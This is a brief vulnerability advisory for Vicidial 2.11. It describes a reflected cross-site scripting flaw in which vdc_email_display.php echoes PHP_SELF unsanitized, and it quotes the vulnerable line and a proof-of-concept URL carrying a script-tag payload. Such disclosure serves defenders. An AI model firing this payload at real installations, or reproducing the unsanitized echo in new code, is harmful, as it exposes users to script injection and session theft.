Vicidial version 2.11 suffers from a reflective cross site scripting vulnerability.
470527fc33fccb2596dd91bd347a8e1ba1e96a9b5a7baa96273bae4002438f37
# Exploit Title: Vicidial 2.11 - Reflective XSS
# Date: 0 day
# Exploit Author: David Silveiro
# Exploit Author Github: github.com/davidsilveiro
# Vendor Homepage: http://vicidial.org
# Software Link: https://sourceforge.net/projects/astguiclient/files/astguiclient_2.11rc1.zip/download
# Platorm: PHP
Vicidial is an opensource contact center suite, with outbound and inbound calling as well as many other features.
Vulnerability:
vdc_email_display.php suffers from a reflective XSS vulnerability from
unsanitized user input from;
$_SERVER['PHP_SELF'] on line 387
And then echoed...
<form action='<?php echo $_SERVER['PHP_SELF']; ?>' method='get' name="email_display_form" id="email_display_form" onSubmit="if (this.submitted) return false; this.submitted=true" enctype="multipart/form-data">
POC:
http://127.0.0.1/vdc_email_display.php/<script>alert('XSS')</script>